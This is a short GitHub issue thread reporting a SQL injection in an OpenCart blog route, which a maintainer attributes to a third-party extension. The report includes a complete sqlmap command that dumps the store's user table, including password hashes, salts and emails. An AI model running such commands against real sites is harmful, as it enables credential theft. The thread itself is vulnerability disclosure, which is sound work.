### ISSUE TITLE
SQL Injection Fault

### ISSUE THREAD

**Issue by Gabriel-Lacorte** [opencart/opencart#14002]
OpenCart is vulnerable to a SQL Injection flaw that can be reproduced with the payload below

```sh
 sqlmap -u "/index.php?route=extension/tmd/blog&tmdblogcategory_id=4&blog_id=2*" --dbms="MySQL" --random-agent --force-ssl --risk=3 --level=2 --tamper=space2comment --batch --current-db -T oc_user -C username,password,salt,email,ip,code --dump --flush-session
```

**Comment by mhcwebdesign** [comment]
This refers to a 3rd party extension, because there is no 'extension/tmd/blog' in 4.0.2.3 or the current master branch. Hence, it's not an OpenCart issue.

**Comment by Gabriel-Lacorte** [comment]
Thanks
